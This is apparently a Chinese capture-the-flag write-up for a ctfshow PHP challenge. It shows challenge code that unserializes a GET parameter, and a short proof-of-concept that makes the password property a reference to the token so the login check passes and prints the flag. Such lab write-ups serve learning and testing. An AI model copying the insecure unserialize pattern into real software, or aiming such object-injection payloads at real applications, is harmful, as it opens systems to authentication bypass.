PHP/5.6.40变量引用

    1. <?php
    3. /*
    4. # -*- coding: utf-8 -*-
    5. # @Author: h1xa
    6. # @Date:   2020-12-04 23:52:24
    7. # @Last Modified by:   h1xa
    8. # @Last Modified time: 2020-12-05 00:17:08
    9. # @email: h1xa@ctfer.com
    10. # @link: https://ctfer.com
    12. */
    14. error_reporting(0);
    15. include('flag.php');
    16. highlight_file(__FILE__);
    17. class ctfshowAdmin{
    18.     public $token;
    19.     public $password;
    21.     public function __construct($t,$p){
    22.         $this->token=$t;
    23.         $this->password = $p;
    24.     }
    25.     public function login(){
    26.         return $this->token===$this->password;
    27.     }
    28. }
    30. $ctfshow = unserialize($_GET['ctfshow']);
    31. $ctfshow->token=md5(mt_rand());
    33. if($ctfshow->login()){
    34.     echo $flag;
    35. }

    token 会变,让 password 成为 token 的引用就好了

    poc

    1. <?php
    3. class ctfshowAdmin{
    4.     public $token;
    5.     public $password;
    6. }
    8. $admin = new ctfshowAdmin();
    9. $admin->password = &$admin->token;
    11. echo(urlencode(serialize($admin)));
    13. ?>

    image.png
    flag
    ctfshow{004e5324-66ef-4c7e-9a24-4d48c0c02176}